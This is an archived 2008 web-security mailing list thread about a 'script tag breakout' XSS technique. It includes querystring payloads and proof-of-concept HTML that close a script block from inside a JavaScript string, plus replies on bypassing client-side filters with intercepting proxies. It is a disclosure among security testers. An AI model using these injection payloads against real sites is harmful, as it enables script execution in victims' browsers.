WebApp Sec mailing list archives
RE: Script Tag Breakout
From: "Auri Rahimzadeh" <auri () auri net>
Date: Tue, 21 Oct 2008 11:36:24 -0400
Yeah, but the hole is still there. True, it's bad programming practice. BUT: There's no good reason for a modern browser to allow code execution from within a string assignment. Yeah, I can see *why* it does it, but shouldn't have this been mitigated long ago? Best, -Auri Rahimzadeh -----Original Message----- From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of Taufiq Ali Sent: Tuesday, October 21, 2008 1:41 AM To: Nick Von Dadelszen Cc: webappsec () securityfocus com Subject: Re: Script Tag Breakout Hey Nick, This is is very much there & there lot of grease monkey (Firefox addon) scripts that do the same. However if the website uses javascript for getting rid of the meta characters then its poor design as this can very much be bypasses using a application proxies like paros, webscrab, burp suite etc. So once the script verifies the code they can be then captured in above mentioned proxies & manipulated. What you just mentioned will work with websites that use javascript to filter out their meta characters. Taufiq -------- Original Message -------- Subject: Script Tag Breakout From: Nick Von Dadelszen <nvondad () gmail com> To: webappsec () securityfocus com Date: 10/20/2008 7:04 AM
ey all, Not sure if this is a known issue or not but thought I would share. Its not a common situation to occur but I've used it a couple of times in the last couple of years while testing apps. -- Description -- Able to break out of a string variable without using quotes through the use of a </script> tag. For example, if the code of a page does the following: <script> somestring = "[your querystring here]"; </script> You would normally break out of this with the following querystring=";[code here] If the code checks for a double or single quote and removes it, you cannot normally break out of this code. However, you are able to close the current script tag, even from within a string variable. So, the following two breakouts work: querystring=</script>[HTML here] querystring=</script><script>[javascript here]</script> The resulting code looks something like the following: <html> <body> <h1>Script Tag Breakout PoC</h1> <script> string = "</script><h1>Parsed HTML Code Here</h1><!--"; </script> </body> </html> Or: <html> <body> <h1>Script Tag Breakout PoC</h1> <script> string = "</script><script>alert(document.location);</script>"; </script> </body> </html> In the above HTML, the javascript alert function is called regardless of it being contained within a string variable. -- Tested Browsers -- All version of IE and Firefox up to and including IE 7 and firefox 3. --------------------------------------------------------- Nick von Dadelszen Lateral Security www.lateralsecurity.com --------------------------------------------------------- ------------------------------------------------------------------------- Sponsored by: Watchfire Methodologies & Tools for Web Application Security Assessment With the rapid rise in the number and types of security threats, web
application security assessments should be considered a crucial phase in the development of any web application. What methodology should be followed? What tools can accelerate the assessment process? Download this Whitepaper today!
https://www.watchfire.com/securearea/whitepapers.aspx?id=70170000000940F -------------------------------------------------------------------------
------------------------------------------------------------------------- Sponsored by: Watchfire Methodologies & Tools for Web Application Security Assessment With the rapid rise in the number and types of security threats, web application security assessments should be considered a crucial phase in the development of any web application. What methodology should be followed? What tools can accelerate the assessment process? Download this Whitepaper today! https://www.watchfire.com/securearea/whitepapers.aspx?id=70170000000940F ------------------------------------------------------------------------- ------------------------------------------------------------------------- Sponsored by: Watchfire Methodologies & Tools for Web Application Security Assessment With the rapid rise in the number and types of security threats, web application security assessments should be considered a crucial phase in the development of any web application. What methodology should be followed? What tools can accelerate the assessment process? Download this Whitepaper today! https://www.watchfire.com/securearea/whitepapers.aspx?id=70170000000940F -------------------------------------------------------------------------
Current thread:
- Script Tag Breakout Nick Von Dadelszen (Oct 19)
- RE: Script Tag Breakout PortSwigger (Oct 20)
- Classic ASP security course at OWASP summit Calderon, Juan Carlos (GE, Corporate, consultant) (Oct 20)
- Re: Script Tag Breakout Taufiq Ali (Oct 21)
- RE: Script Tag Breakout Auri Rahimzadeh (Oct 21)
- RE: Script Tag Breakout Stefano Di Paola (Oct 21)
- Message not available
- Message not available
- Script Tag Breakout Nick Von Dadelszen (Oct 21)
- FINAL NOTICE: OWASP Portugal EU Summit Dave Wichers (Oct 27)
- RE: Script Tag Breakout Auri Rahimzadeh (Oct 21)